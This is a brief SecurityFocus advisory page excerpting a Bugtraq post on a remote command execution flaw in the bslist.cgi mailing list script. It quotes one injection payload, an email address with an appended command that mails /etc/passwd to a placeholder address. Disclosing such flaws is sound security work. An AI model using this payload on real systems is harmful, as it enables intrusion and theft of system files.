Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Brian Stanback bslist.cgi Remote Command Execution Vulnerability

Excerpted from bugtraq post by <rivendell_team@yahoo.com> / Elf <whitehatjoe@hotmail.com>

---
This can be exploited by signing up for the mailing list with the email address of

'hacker@example.com;/usr/sbin/sendmail hacker@example.com < /etc/passwd'
---







 

Privacy Statement
Copyright 2009, SecurityFocus